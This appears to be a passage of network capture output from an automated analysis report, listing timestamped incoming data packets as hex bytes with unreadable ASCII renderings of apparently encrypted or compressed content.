                                                                                                                                                                                                2023-11-17 18:25:36 UTC70INData Raw: 20 20 43 88 7c ba 7d 1a 36 2b 66 97 f1 e6 23 6f dd eb 81 a3 d3 2d 11 c4 58 d9 45 af 4f 7e bd 67 b5 e2 17 1e cd a6 49 a9 32 58 73 49 91 51 bd 4b a7 5c aa 0b 72 ce 51 3d dc 6a f1 73 30 24 0d 99 16 09 51 60 4e 56 e1 3b 9d c2 cc 43 2d d0 0e 2f 43 5d 40 33 6c f6 6f 87 1b 20 20 4f 4e 91 75 44 6e d0 6c 40 39 22 e7 23 44 c7 99 ee ea 59 de a1 d8 e2 54 79 cf 92 50 b4 f2 04 bb aa 2c cc c8 23 70 54 7f e0 55 ce 72 e8 9b 0f c9 f1 f4 19 84 4a 67 b8 9f 64 51 bd f3 28 ea 44 f8 84 da 98 47 a9 fd 5b 21 6b ea 11 c4 25 a2 7a c4 50 62 ae 9c ae a8 60 8b 43 dd 61 20 b8 a4 b3 58 64 79 cc 81 25 36 e8 04 21 64 35 e0 9f 36 3f 73 d6 fb e2 e8 3a 2a 4d e5 6e f3 ec 7c 5c 19 47 e7 45 8f 50 91 15 52 ac 26 78 a9 09 d9 be fc de 0b 4c c9 bb a9 7d 6b ea 28 cf a3 c3 d7 73 92 ed 50 5c c0 e2 0f
                                                                                                                                                                                                Data Ascii: C|}6+f#o-XEO~gI2XsIQK\rQ=js0$Q`NV;C-/C]@3lo ONuDnl@9"#DYTyP,#pTUrJgdQ(DG[!k%zPb`Ca Xdy%6!d56?s:*Mn|\GEPR&xL}k(sP\
                                                                                                                                                                                                2023-11-17 18:25:36 UTC72INData Raw: 86 24 9e d3 3a ef 21 fa 18 82 42 a0 96 28 79 61 e4 16 3c f3 b5 54 bf 3c 7d d7 3b 17 c4 e4 5c 86 49 cf f5 94 bc d4 aa 63 f6 b5 cf 6f f7 ff d5 3b c8 d1 55 af 55 b6 12 ba 24 bb 11 41 64 c6 39 2d 76 e7 d4 54 12 b9 bc de ee e5 0a 3b 66 1d 38 00 4f 8b 7a 39 fc e2 55 fa 3c ec c8 40 a4 b7 cc 17 0a 1f 83 1b 98 ac 3c 58 2d ed c8 da 2b 60 b9 26 c8 eb 55 b5 ed c8 c8 1a 2e 0c 44 29 d7 2b 65 79 72 09 6b a2 bf a8 2e f8 f9 fe 17 19 73 cb 04 92 3e 6f 03 19 e7 f9 3e 79 34 b6 41 bb bd 32 7e a2 45 4e e8 e3 b1 fc 52 6b e5 d4 83 54 53 11 50 a3 dc 97 9e b6 01 a1 5d b1 e9 22 ae ba 95 af 17 f7 2e 46 d5 fa 04 ee 8a 76 42 92 b0 88 b0 44 3d 4f 4d e8 f7 e1 6e ee 13 16 7d 76 6e e8 e2 af 0d 9e 56 85 0c a5 1b 4b 3d 34 8f 0f 58 e5 8d 8e c3 b3 5d d3 eb bb e9 2a c8 8e 74 9e 09 1f 39 73 8d
                                                                                                                                                                                                Data Ascii: $:!B(ya<T<};\Ico;UU$Ad9-vT;f8Oz9U<@<X-+`&U.D)+eyrk.s>o>y4A2~ENRkTSP]".FvBD=OMn}vnVK=4X]*t9s
                                                                                                                                                                                                2023-11-17 18:25:36 UTC73INData Raw: 64 2e 58 79 87 29 44 f1 40 73 a5 63 86 62 5b 8b 8a 8e 21 4b d9 d2 58 b2 55 9c 47 88 13 e8 58 76 7c 6b 2e 38 e8 d5 d0 78 f8 4d 47 b0 31 81 93 4d 54 74 6d 75 96 57 08 ee 37 0e f7 27 ae 4c 0c 0a 4e 1a ca aa 6d c7 ac 6b 14 ca ad 1a e4 07 e8 b0 cf 3b 3a 73 fb f5 be 05 c2 81 8f 52 1b 6e a5 ee 7e 31 a8 ec 47 f3 e6 85 7f 15 3d de a1 83 4f a7 13 72 51 8d 25 33 bb f4 23 dc f7 4d 5e c8 05 2e 06 71 46 24 6d 7d db 1e c1 e0 52 73 68 79 80 8e f4 9b 1e 46 4f 79 df 0d 75 19 6c 47 86 f0 6f cb f9 59 33 ed 7b 58 f1 76 ce 2a 4b 0a ae 56 e1 b5 5f ab 55 f9 bd 58 0f 42 70 01 28 f3 97 fd 99 c6 e3 c8 e3 c8 09 97 81 f7 64 2b 36 9c d6 85 1b 16 6b db d7 db d8 33 f2 71 13 0a 70 d0 e2 74 20 3c 35 d2 da 5e b8 20 b5 d7 43 c2 17 ec e3 6d 55 e1 a4 b1 1e 79 3f 4e 89 b3 78 46 2b 07 f2 f6 32
                                                                                                                                                                                                Data Ascii: d.Xy)D@scb[!KXUGXv|k.8xMG1MTtmuW7'LNmk;:sRn~1G=OrQ%3#M^.qF$m}RshyFOyulGoY3{Xv*KV_UXBp(d+6k3qpt <5^ CmUy?NxF+2
                                                                                                                                                                                                2023-11-17 18:25:36 UTC74INData Raw: 69 3e e6 7f 5d 69 4c d8 c8 18 08 3f af 6c b9 aa 39 86 16 11 6b ca da 4a 53 9a 17 4e 94 96 97 46 58 8a 72 22 e5 dd c2 ef 91 3b a3 25 48 0b f7 24 c7 66 54 9a 49 07 16 e9 e8 73 e6 94 73 84 b4 8b 5f 82 e5 10 b1 10 54 4b 37 bd a8 83 c2 43 c7 8c f1 d6 e5 da 0e 2e c8 39 73 c7 4e 22 a1 45 3d 03 b6 60 9a 91 8e 24 7d eb 3f 2a 73 b3 cf 39 2a 51 de 86 7f 32 30 d7 bb 8f 6e 81 fc ea ea 43 b8 d6 8b 37 4b 0f 07 8d 11 14 19 33 37 e1 c7 2b 20 0e 29 e6 3d d6 ef a9 ac 93 e2 cf 42 80 6f 3e 6f 03 26 85 46 a1 72 bb 90 ee 8d 45 35 af 8b eb c6 cf 1a bf 6d 4f 08 58 af 4a 10 79 33 62 c7 52 33 29 e1 0e 1d 04 b3 cd c6 f1 99 d0 d8 f6 15 5e f3 94 1b 83 9d 6c 3b 88 8c dd da 2f 83 f8 6e 1b 47 b4 68 f1 8c 90 2d 0b 52 2a aa 44 52 23 e2 45 c7 00 8b b8 93 82 80 50 0b 7d c7 1b 23 7a 9f 2c 52
                                                                                                                                                                                                Data Ascii: i>]iL?l9kJSNFXr";%H$fTIss_TK7C.9sN"E=`$}?*s9*Q20nC7K37+ )=Bo>o&FrE5mOXJy3bR3)^l;/nGh-R*DR#EP}#z,R
                                                                                                                                                                                                2023-11-17 18:25:36 UTC75INData Raw: 0f ae c4 d3 2a 6e 3b 6e 5d 2d 0d 4b ac 66 05 77 2d eb fe 7e f5 bf 9a f2 98 2a 60 69 35 20 04 3c 4a 53 63 a8 e5 63 a6 3c 38 c0 cc b9 5b 63 e3 1c 38 fc 2a 89 dd 66 97 a7 2e ce 05 10 63 3d 83 22 e2 b3 54 0b 38 fc c1 14 b9 74 56 21 31 e2 9a 28 58 07 e0 db 11 cf ce 3a 85 a6 71 46 a2 48 f7 b7 69 af 0d 91 ea fa a4 a5 32 dd ad 41 35 2d 21 de 75 9a 6f 29 ce 91 44 8c 7f ef 1e 29 a5 06 64 e8 7a cd 71 9e 29 87 dd f7 d0 1b 48 c2 8f 23 e0 63 4e 38 88 75 ff b7 93 58 64 a9 e2 14 9f 94 3c 17 f8 fb 7a 8b 45 65 f6 e1 dc aa 19 dc 24 21 88 a9 a6 ce 20 79 5a b5 0a 0c 42 01 b4 b7 18 87 53 50 fe f1 1f 83 e9 15 d9 3e 75 aa 56 1a 49 12 0d 09 a9 3d 64 3e 70 7b b1 08 28 ff d3 7e f1 dc 36 cb 0c d7 40 65 4b 04 d7 6c 5a cf 70 d0 d5 cc 46 c5 bc de 09 eb ce 40 fe ef 71 ca fc db e5 4d ef
                                                                                                                                                                                                Data Ascii: *n;n]-Kfw-~*`i5 <JScc<8[c8*f.c="T8tV!1(X:qFHi2A5-!uo)D)dzq)H#cN8uXd<zEe$! yZBSP>uVI=d>p{(~6@eKlZpF@qM
                                                                                                                                                                                                2023-11-17 18:25:36 UTC77INData Raw: 15 78 9e 82 ae e0 7f af 42 f1 f1 cb 08 63 bd 4d 16 cb 16 4f 0e c6 b7 b7 9c 8f b4 55 b3 db af d1 2a 73 e2 de c6 48 2c b8 e4 8d fc 21 45 a2 cc c2 81 d5 d3 cb f1 d7 b5 12 ec 5e 42 2d 84 57 7e 27 80 34 7f 0f 5d 58 fc e6 ec 00 a4 24 c2 2e 1d 10 43 0c 65 93 19 22 18 a4 48 52 8e a5 83 38 40 60 76 ec 23 c0 ce bf 39 b0 c1 0c 72 ff c3 0d 58 df 3f 04 51 47 51 fa 94 14 fe 95 d5 c9 27 c0 39 9d c8 25 54 f4 8b 9b e0 b0 e3 3f 47 81 08 11 e4 56 b3 58 65 a6 ba 06 b9 6b ae b6 5d c4 f4 27 b1 5d 4c 00 29 a4 da 25 8c e1 8c 2f 78 8b aa 0b 12 5c 69 e6 3a b8 51 c1 bb 31 95 ec 02 3b 56 7b 91 62 1d 30 e1 30 a2 98 d2 78 32 18 9c 64 e9 ea d3 fa 46 3f 00 0f 43 1c 10 0e 35 79 ec 10 05 27 63 cc d6 28 c1 5b 1a 59 86 98 92 78 e9 92 e0 85 e5 8b d1 30 1b 48 eb e3 9c 62 bc 67 94 67 5c 43 bc
                                                                                                                                                                                                Data Ascii: xBcMOU*sH,!E^B-W~'4]X$.Ce"HR8@`v#9rX?QGQ'9%T?GVXek]']L)%/x\i:Q1;V{b00x2dF?C5y'c([Yx0Hbgg\C
                                                                                                                                                                                                2023-11-17 18:25:36 UTC78INData Raw: 7a ec 57 4a b5 32 ad 4c 52 5c 2c 81 f4 96 2b 6f d4 a0 3c 93 c1 be 0b 36 7a c5 bc 27 d2 59 c5 ef a6 de fb 4d 96 51 56 06 e2 b4 08 a4 9e 2e 56 74 8e 9f ec de 82 7a 50 ea 0d 1e c6 ec b0 6b de a6 56 f2 a9 50 b9 c4 8a 65 c6 1e 56 06 32 e1 34 cd 15 39 ea 62 55 e2 83 31 64 1a ed 02 71 3e 04 53 66 3d b4 84 2c e3 0a 7f 65 9c 5d 9c 4a b5 03 dc f5 b5 6a f9 60 aa 37 8c 46 f2 e6 3f c6 5d 90 1f 1e 9c 38 ca 43 6c 2a 86 16 c8 cb 56 35 5d d3 cb 1e 14 9e 13 ef 0d 4a fe c4 cd f9 b0 dd 5b d9 96 e6 61 31 e2 38 f8 3c 17 e1 8a 8a bc 3c 09 83 4e 6f 02 85 64 c9 00 3c ad 3b a8 a4 fa 89 89 13 90 ee 0c 94 e5 de 4f f8 c3 2c cb 60 7f 8e 85 be 85 eb 73 bc 7a d5 93 47 ae 48 32 24 cf ce f9 c5 e4 1c 3a 28 48 a8 c9 37 4b 42 d7 7a 0f 3f 26 8d 99 c5 17 05 50 09 c5 91 b9 f0 38 9d a4 7b 14 b8
                                                                                                                                                                                                Data Ascii: zWJ2LR\,+o<6z'YMQV.VtzPkVPeV249bU1dq>Sf=,e]Jj`7F?]8Cl*V5]J[a18<<Nod<;O,`szGH2$:(H7KBz?&P8{
                                                                                                                                                                                                2023-11-17 18:25:36 UTC79INData Raw: 5d 01 cc 3e 1b f1 16 9f 84 44 e7 19 8e 24 8e 5e 3e 89 7a 1c 32 0e 6a a8 38 71 6f 27 b9 55 94 65 a3 df 29 67 6b 38 63 a8 a4 5d e9 b8 62 84 65 08 40 3d 6d c8 5f 71 31 00 dc 52 a8 29 ff 7a a2 17 6e dc c9 77 3a 71 d2 0d f1 f3 28 0a ec c2 6a a5 52 76 4d 47 ab f5 d1 59 03 26 ab 50 05 fe 66 77 d1 70 63 e2 f9 8c 92 94 b0 85 29 d4 aa 93 0d a0 80 06 5e 98 18 39 45 41 45 a1 a9 15 65 87 aa 89 24 0f 9f ea ac 53 a1 aa fc 64 d6 b2 65 af fd c9 0f 13 90 f0 96 be 08 0f 2c f0 28 bb b5 0b 2a ba 09 ba 3d c6 30 36 82 c3 6c f1 12 4f a6 24 69 f3 58 94 85 69 52 d5 6b e6 04 3d 6f 86 03 50 e0 cb 95 51 05 e4 a6 89 09 01 cb d0 fd cd 32 8b 39 0e 41 7c 1f cb b2 a6 fc 50 ee 5f 06 4a fa 0f cc c0 93 48 07 54 09 6a a6 4e 79 84 c2 88 e7 cd cc cc 5b c7 1b e8 b6 ef 82 29 b2 5f 4a bb 52 1e 86
                                                                                                                                                                                                Data Ascii: ]>D$^>z2j8qo'Ue)gk8c]be@=m_q1R)znw:q(jRvMGY&Pfwpc)^9EAEe$Sde,(*=06lO$iXiRk=oPQ29A|P_JHTjNy[)_JR
                                                                                                                                                                                                2023-11-17 18:25:36 UTC80INData Raw: b5 ef ae 7f a5 af 5d ab 21 1f 6d ed 98 d1 39 e6 92 dd 85 95 0e b9 a3 5a 1f 30 2e 26 84 bb 60 4b 20 86 02 d3 2f 9b 74 e9 bd bc 22 f9 ba 2f b9 ad 17 5a 25 59 03 d2 b9 05 e8 d5 dc b3 8d f9 d6 93 aa 3d 93 38 47 34 25 bf 2c 06 5f 26 e0 6b 7d e5 66 38 bf 84 b1 23 c8 b1 d9 ee 00 87 bf 51 83 29 ea b7 8a 52 de b7 b8 3e 09 b0 87 be 27 b6 1f f2 e5 95 1f bf f1 4b a8 34 23 a6 9f 36 58 42 15 c6 9c a1 0c b7 9e 9d 52 d3 2b 4f c7 cf bb a5 53 d0 42 06 a8 45 83 1d 0e 50 a2 c5 f9 29 ff c6 56 5f 55 f7 37 11 39 31 d8 7f 22 91 1a 12 83 e3 14 0b 77 d7 b5 6d eb f7 d8 04 c4 5d be 35 6f 80 e1 22 93 f5 92 0a 2c 88 0d c5 d6 1b 99 06 e1 e2 09 75 fd 3e 68 91 ee bf 56 0e 5c 43 15 72 7d 57 20 63 53 3f 12 f2 9f 8c c4 db 03 21 5c 6b f8 ea cf 7d f2 41 d7 38 d7 9b e2 11 fb e6 1a c9 41 fe d6
                                                                                                                                                                                                Data Ascii: ]!m9Z0.&`K /t"/Z%Y=8G4%,_&k}f8#Q)R>'K4#6XBR+OSBEP)V_U791"wm]5o",u>hV\Cr}W cS?!\k}A8A
                                                                                                                                                                                                2023-11-17 18:25:36 UTC81INData Raw: 45 d2 3a c3 81 3b 3c 80 73 ae bb 8d c1 a4 4f 1d 55 1a 5a 17 4d 4d f5 92 67 27 1e db f4 fc 7a da 5a 50 38 5f f4 58 64 6a df 2b 99 51 42 ff 53 a8 18 94 e9 30 d4 c2 e3 ad 5c 95 fc b9 29 61 54 ec 46 e7 26 2a 83 d7 54 73 16 2c 70 65 aa 40 c3 2c 06 e0 19 da de 7c d4 fa dd f4 8a 51 61 c1 66 c5 64 d1 c2 ca fc 11 d5 36 de 54 86 36
                                                                                                                                                                                                Data Ascii: E:;<sOUZMMg'zZP8_Xdj+QBS0\)aTF&*Ts,pe@,|Qafd6T6
                                                                                                                                                                                                2023-11-17 18:25:36 UTC82INData Raw: d7 b1 4b ef b5 f6 98 b3 5a a8 94 b2 f6 90 be 81 d2 ab 70 11 41 ec 23 e8 51 c2 3e cb 0e ff 0f b8 2a 0d b6 0a f9 80 45 01 83 f2 33 9c e7 b3 11 fa fa 87 74 4d 94 e5 fd df 62 a8 6d 12 fe 31 87 b2 ee b6 66 22 08 09 de 21 a3 17 c6 24 97 a0 ba 5d 47 8d 01 ae 05 c6 47 11 b8 dc 40 49 af 06 38 43 ae 8c c0 06 29 11 f6 6b 1d 4f 05 57 5a de bf 9d bb 21 e6 c8 c4 e7 60 a4 a7 52 1c a7 47 2d fd 32 f7 26 c7 63 42 8f a9 13 28 63 98 d8 b9 6d 2e d2 ba e2 8a 91 f4 cd b8 d9 15 4f de dc 87 d0 a3 fc eb 0c e2 2f 76 c3 45 14 0f a1 f1 9c b8 71 ac ac 97 60 d0 a4 80 fe 7c 2e 0b 79 d3 b1 57 99 21 6a 55 62 16 9b 2d 7b b1 d3 bd 19 e7 b5 0e 4c ec d2 18 7c 15 3b e9 7a d7 32 2e 15 46 ac 7f 18 b5 e6 a4 22 2f c7 44 13 ea ee 1f df b2 3f f8 1c 36 ac 52 70 20 32 7a 35 82 b4 17 2a 52 46 62 68 c7
                                                                                                                                                                                                Data Ascii: KZpA#Q>*E3tMbm1f"!$]GG@I8C)kOWZ!`RG-2&cB(cm.O/vEq`|.yW!jUb-{L|;z2.F"/D?6Rp 2z5*RFbh
                                                                                                                                                                                                2023-11-17 18:25:36 UTC83INData Raw: 35 51 ae 7a 5a 79 fa 6f cd c7 fe 33 09 1f ae 12 7e 1f 66 1f df 92 4c 48 28 80 96 0c 7f 03 74 53 88 86 fc 9b 7b ef e0 0b ad a2 0d a8 04 83 c4 2d 6c 59 2d 21 d7 55 c1 18 19 fe ad 31 fe 06 25 0f 24 99 71 c4 b4 2d d7 3e d4 9c 59 38 78 18 0b d9 d1 57 4a 29 30 a9 d5 1c eb 26 79 80 fc e1 04 1c 38 17 45 ad 16 0b 76 da be 0c 90 06 60 ab a9 46 20 32 3a d4 6b bb 7a e9 71 dd 89 58 43 d0 89 b1 8e 61 9b 88 29 d4 a7 cd 97 7e b5 14 42 d6 05 5f 4e 11 42 45 56 b9 a4 3c 58 7a 5c d9 8f 2b 3c fa 5f b6 10 a7 ef 06 04 5d aa bf ec e0 3d f1 cc a8 c7 d3 20 d3 fe 3d 78 bf 8c d4 26 36 0d 7e 70 38 d9 2b 4e b3 3a 56 0d 74 9a 7b 96 93 2b 53 17 3e 59 16 85 38 33 54 d6 be fc b9 d2 30 93 45 ab 13 71 41 25 42 9a ca 54 5a cc 4a 8e 99 ea dc 47 7e 29 99 c8 57 35 ef b6 d1 ec 65 c1 5f e3 b0 fb
                                                                                                                                                                                                Data Ascii: 5QzZyo3~fLH(tS{-lY-!U1%$q->Y8xWJ)0&y8Ev`F 2:kzqXCa)~B_NBEV<Xz\+<_]= =x&6~p8+N:Vt{+S>Y83T0EqA%BTZJG~)W5e_
                                                                                                                                                                                                2023-11-17 18:25:36 UTC84INData Raw: 3b 4f 72 3b 2f dc 1e 90 4a 39 53 bc 47 6c b8 b7 50 c1 19 cc 55 5f 45 ca 6d 16 81 c6 59 44 42 9b 2b 7b ae c9 02 b9 bd d4 0e 9e 82 02 48 89 ec 92 87 1c cc 75 97 8f d3 fa b6 c1 82 ab 68 c9 35 26 5b d1 b6 d1 41 0f 6b 35 af b7 50 f9 2f 09 4f 5d 39 d5 c7 da 2b f7 ce 5f 32 22 b3 be ee 8e 15 bc 22 44 22 77 76 05 03 7b 6e 77 9e 16 f3 ac a3 5a c3 52 f3 bd 73 0e b3 b1 83 69 d2 81 56 b6 fd 3a e8 66 8c 73 eb c9 a7 e1 73 d4 3a 13 f2 17 a1 95 e2 0f 7a 1b 91 05 78 d2 39 65 f5 0f 85 b3 77 e8 bd 97 66 1e 42 63 cf 6f d1 7d ca 72 95 a6 d6 1a e2 15 13 ab 14 e4 a2 af 50 57 09 ae 3e db f0 89 6a 4a 3f 1b 8f 3c bf 89 9f 53 1e 53 d2 cd 4e cd 4f 21 be 6a b1 37 cf 2f 48 3a 9d a0 10 0f 8c ad 95 3b 10 b6 d8 3d 89 6f 16 1c eb 73 cb a6 b3 6f 5e 67 cf 45 01 35 84 5e c9 da 51 6e 12 87 ba
                                                                                                                                                                                                Data Ascii: ;Or;/J9SGlPU_EmYDB+{Huh5&[Ak5P/O]9+_2""D"wv{nwZRsiV:fss:zx9ewfBco}rPW>jJ?<SSNO!j7/H:;=oso^gE5^Qn
                                                                                                                                                                                                2023-11-17 18:25:36 UTC85INData Raw: ef 74 1d 37 42 71 98 65 eb 03 dc 9d a9 43 b4 77 57 e0 1d 6e 4b 12 ed 4f c2 2b 7b c5 63 96 a9 28 d7 46 33 e5 ec d8 81 79 e2 c4 f6 4c 90 a7 28 9e 03 c6 0f 9a 02 91 19 1a 0f 47 48 fd 9a 56 18 9f 74 cd af 8c d5 4b 6d 76 10 dd cb c5 b6 c8 ab e6 90 23 89 f5 c0 83 ca 2e 18 70 bd 74 ca 18 d1 d1 30 ad c9 64 b6 83 35 4f 62 84 7f 62 2c 4e 1f 46 26 78 10 61 d2 81 3e 89 37 07 f2 1b d6 de b9 3f 61 5c b9 61 96 f6 4a 85 b6 e6 92 0f f9 96 37 05 32 20 b6 b6 55 ee a7 ce 4d af a3 bb 26 bd 75 a1 0b 6a 39 ca 9c fd 7f 13 dd de 75 1b 23 1f 68 55 70 ac 3a de c5 e0 54 6e 4c cf 4d 9f 71 f4 3a 3a 52 a1 cd 70 a6 98 e0 4c 1a b6 c7 d2 25 31 0d bf c1 c4 c5 62 47 dc f2 03 b1 d4 54 07 fa c2 3d 18 5b d4 95 1c af 67 15 d3 8d 34 ab be 39 51 56 9a 3e 5f d8 9c 95 69 fe 10 6e c9 f3 3f 95 34 9b
                                                                                                                                                                                                Data Ascii: t7BqeCwWnKO+{c(F3yL(GHVtKmv#.pt0d5Obb,NF&xa>7?a\aJ72 UM&uj9u#hUp:TnLMq::RpL%1bGT=[g49QV>_in?4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC86INData Raw: a2 90 3c e1 86 9c d4 28 a2 fd 4d f6 ff ba 3e 1a 2d 96 a5 ed 81 cf e0 b0 c0 da 3d 87 de 6e 2e 51 7a b8 6e 29 41 8f ae e8 d7 d8 5e 23 58 42 a8 a6 01 4d 6b e3 d3 c5 27 8c e1 7e 81 f0 52 93 61 3b 98 2a 6d 9a ad 03 31 7a d4 6a f2 03 4c e4 82 df e6 6d 59 67 f2 3f 91 6c 02 de c2 d6 2f 18 07 c4 a6 c9 82 a6 87 ee 8c 61 ca df 73 03 7d 55 92 a9 14 e2 63 af 73 1e fb d1 3a 7e 59 c8 a7 d2 c2 52 92 0e 57 06 9c 5c 4e c8 51 75 94 55 54 5d 50 5c b0 05 d3 4a 72 7c ff 86 b4 26 51 ab 8c ad 0d 54 cb 06 83 44 b8 64 09 fb ae ea 15 ca 0b 69 23 53 7d 7a 8b 65 c3 ee 2b b1 bf d8 8c 7e 8d 49 e5 58 1a d3 a0 c2 24 8c 36 33 bb 02 3b f4 82 99 46 30 e6 ab d1 5c 3e bc 37 00 43 7c fb aa 12 d9 a2 b4 0b e1 65 f8 1b 4c ba 0f 79 be be a1 a7 d4 26 bc a3 2a fa 63 14 fe ee 38 e0 5f 8d 91 cf ae 42
                                                                                                                                                                                                Data Ascii: <(M>-=n.Qzn)A^#XBMk'~Ra;*m1zjLmYg?l/as}Ucs:~YRW\NQuUT]P\Jr|&QTDdi#S}ze+~IX$63;F0\>7C|eLy&*c8_B
                                                                                                                                                                                                2023-11-17 18:25:36 UTC88INData Raw: ab fb dd e9 ee 31 28 05 85 86 85 00 b6 3e 90 31 3f 47 55 a8 01 19 9e 46 12 6b 78 5c d7 92 1d 42 68 90 f9 0d 86 cb c8 10 03 6d 16 ca bf 22 b2 29 fe e4 59 75 bf 3b b4 f8 55 7d 57 a7 34 4d b4 a5 b2 f7 78 82 38 8d 86 31 4c 8f 39 91 44 8a 54 c8 76 a7 b4 c5 8a 39 04 35 0e 3b e8 c6 31 d4 69 e8 8a 1c 4d a1 58 dd 2a 4c d0 13 a2 ff c7 ed 11 17 48 b2 8f e3 69 3f fb 2d 6e 1a ff 62 fd 73 bf 5b 13 e0 ad 74 89 2b 5e fc b7 eb b4 03 c3 74 1c 10 d7 cb 8e b4 92 fd d0 82 5d 42 45 da d6 5a 8f 67 91 62 c1 52 61 b6 30 bc ee e8 25 e3 a7 14 68 8e d1 27 f5 8a 98 b1 ad 8f 95 fb d2 95 62 0c 1c 50 3c 96 cf 78 85 34 e8 e6 6b cd 1d 8b a1 8a bd ba 15 8b 44 80 fd 47 bd ed df dd 3c 1a ad db a7 54 c2 1e 63 a2 e6 64 df ef 27 8a 9e da 9a 62 94 70 6d c2 d2 59 b3 39 cf fc ae de 3b 4a 41 a9 e6
                                                                                                                                                                                                Data Ascii: 1(>1?GUFkx\Bhm")Yu;U}W4Mx81L9DTv95;1iMX*LHi?-nbs[t+^t]BEZgbRa0%h'bP<x4kDG<Tcd'bpmY9;JA
                                                                                                                                                                                                2023-11-17 18:25:36 UTC89INData Raw: 96 bd ab b8 2e 6f 49 06 38 4b 59 c5 8a 7b 5d 42 56 a7 5a 7c 09 bb cd d7 4a c3 61 56 6d 77 44 76 f8 7b b8 7b 3e 12 ef 5e 8e 91 58 e4 04 6a 0f aa 22 22 ce 2b ec 87 34 16 12 79 ce fa ef b4 fe 04 32 78 a7 55 92 52 3a 2f 46 f0 f3 63 a5 44 14 30 2c 66 13 bb 76 90 30 37 4b e8 be f4 15 f3 5e 85 e5 bf 86 2c f6 a3 2b f0 45 54 53 8d fb aa b0 36 9c d7 b7 8c 76 b9 1a 34 1e 3c ee 78 2d be 86 36 44 c1 06 67 2b bf 80 37 2e 82 e9 fd 11 66 55 c5 f8 90 33 12 72 c1 9c bf f4 15 61 58 b0 c9 9a a8 3d 81 88 e6 71 e3 15 c2 98 50 54 e5 98 ee 4d 84 e9 0b 65 ad a7 c9 d2 ca 9e d5 d9 a7 ca 20 92 cc 02 62 03 9c c4 02 2b 56 56 95 38 1f 84 2d ae 95 e7 87 71 7a 56 37 e1 a4 a1 42 4c 74 8e 37 a5 51 8b 59 2f fe 79 69 55 ac ef 5c d9 c5 ca aa 42 b7 65 03 d8 a2 61 4d 6e d7 26 26 a8 ee 46 cc eb
                                                                                                                                                                                                Data Ascii: .oI8KY{]BVZ|JaVmwDv{{>^Xj""+4y2xUR:/FcD0,fv07K^,+ETS6v4<x-6Dg+7.fU3raX=qPTMe b+VV8-qzV7BLt7QY/yiU\BeaMn&&F
                                                                                                                                                                                                2023-11-17 18:25:36 UTC90INData Raw: 31 3c 4d 47 08 db d8 d5 18 f9 6c b1 39 08 e3 59 22 29 cb 86 7f e6 e6 76 06 bb cb 58 53 01 ae 35 98 0a 9a 29 60 26 6d 81 6e fe 84 4f fe b2 1c a0 bf 56 4c 38 ee 14 c5 fa d1 f6 36 bb 29 1a 39 dc 2f a4 3c 02 51 4e e2 34 45 35 6b 9b f4 c5 d1 38 49 df 00 02 5c 1f 9e 96 fd 14 8a 02 3d c6 98 cc b9 3c 24 19 a9 2a 92 a9 4c 9f e3 8f 0c b1 51 9a 55 40 66 88 2d 39 3f b1 a8 d0 6b cb 98 e8 33 69 c4 29 73 0e c6 57 c0 bd f0 0d 58 bd b4 9f b7 5e c3 4b 0c ac 39 b7 88 ff 75 3b fa ba 11 0d c4 9a aa 76 e6 29 7c b7 74 aa de da 03 fc 51 cd 46 17 5c a1 aa 51 35 09 e3 95 48 fd 5c 47 75 17 a1 6f 12 71 44 89 7b 45 cb 41 87 a7 dc f9 54 99 bf ac 52 c0 70 d6 f8 98 0c 55 d3 c6 c4 6c 82 b1 1a d7 7d dc be 8c 74 ff 29 81 b1 d6 7e e9 87 d1 1e 23 91 f5 8d 55 1a 64 77 c7 d8 29 90 cb e5 fb 3d
                                                                                                                                                                                                Data Ascii: 1<MGl9Y")vXS5)`&mnOVL86)9/<QN4E5k8I\=<$*LQU@f-9?k3i)sWX^K9u;v)|tQF\Q5H\GuoqD{EATRpUl}t)~#Udw)=
                                                                                                                                                                                                2023-11-17 18:25:36 UTC91INData Raw: a5 71 03 dd 51 2f bd 70 93 9a 7e f3 c8 b2 71 b6 45 6c 52 fe 34 b7 16 36 71 d1 2f 70 f6 b1 a3 55 a9 b0 56 c7 1c d8 11 ae bf 88 24 f0 fa 8d 0b e2 0d fc 98 aa 24 ce 66 bd 9a 5e 6b 7f 7a 77 49 28 b2 e6 61 d0 e6 b4 3a 86 89 a7 dc b5 1e 19 4d f5 77 b9 33 98 15 57 dc fd 6f 1c a0 30 a4 12 91 70 5a f7 0d a3 df 9d 33 28 d5 2b b4 07 d7 25 73 ba 2d ae 5c 25 ec 01 15 f4 4c ec 71 36 a6 08 0c 88 18 08 60 c6 c4 7f 3b 28 84 24 ac da cf 6c 80 cd 61 91 eb 2c 54 6f 8a 9e ac 12 17 c1 67 39 29 5e d0 bd 79 97 60 dd b0 5f fa 0f 60 ad 23 d9 c3 38 11 46 2b 05 bc 2e df 93 fb d8 04 71 3e 6c f3 88 18 ac a4 07 ca 71 33 f7 da 61 b4 d4 5c c2 cf b7 db d6 4a ed 44 b9 68 76 c0 8b 7e 36 92 c0 fe ef 4a 2b 5a 9f 3f c1 1c fd c0 f8 2e de c7 2c 65 54 77 dd 95 8a 7a 25 ca 8b 4c 49 c6 ba a1 dc 51
                                                                                                                                                                                                Data Ascii: qQ/p~qElR46q/pUV$$f^kzwI(a:Mw3Wo0pZ3(+%s-\%Lq6`;($la,Tog9)^y`_`#8F+.q>lq3a\JDhv~6J+Z?.,eTwz%LIQ
                                                                                                                                                                                                2023-11-17 18:25:36 UTC93INData Raw: 41 c3 b3 31 27 72 f3 e5 93 e8 9c b2 d7 87 01 48 3b 0c 5b 81 b1 38 e1 6f a4 3c 4c d2 0d d9 03 b4 03 85 82 31 2d 89 d0 fa f3 4d 3d 50 3d 90 cb da 64 40 29 a6 27 4e 67 57 ba 2d 89 19 2f bf 14 3e 8a 18 16 80 1c 2b 17 2f 9d 60 65 f9 f1 db be 14 99 42 22 41 24 3a fd 61 ee fc f9 db c3 4e 0e 6f d1 74 32 63 23 72 e0 45 97 b1 22 70 65 c0 60 f4 4b 38 62 fb 5d ae 72 5c a6 e3 8d 62 b6 55 ae ca 32 fe aa 99 7c 40 de 0b 61 73 28 a9 37 3e 6a 1a 4f 4b 2a ae 7c cb 9a 5e d1 80 4b cc 57 4d dd 03 aa 85 02 16 a7 cc b8 39 59 6f 43 e5 be 01 93 d4 61 02 da 35 90 51 14 fa 75 75 a7 0e 36 c3 36 8e a7 18 00 b7 b5 be 2c 10 da 2f af 40 75 64 fa 26 b3 05 79 e1 42 66 e2 dd e1 bc af 35 87 84 f6 3e ef 54 a4 ce 36 ac eb 18 ad 48 51 7e 2a 99 1a 54 8e 2e 1a fe 3f cd 5f f3 39 9e a0 b5 c9 41 14
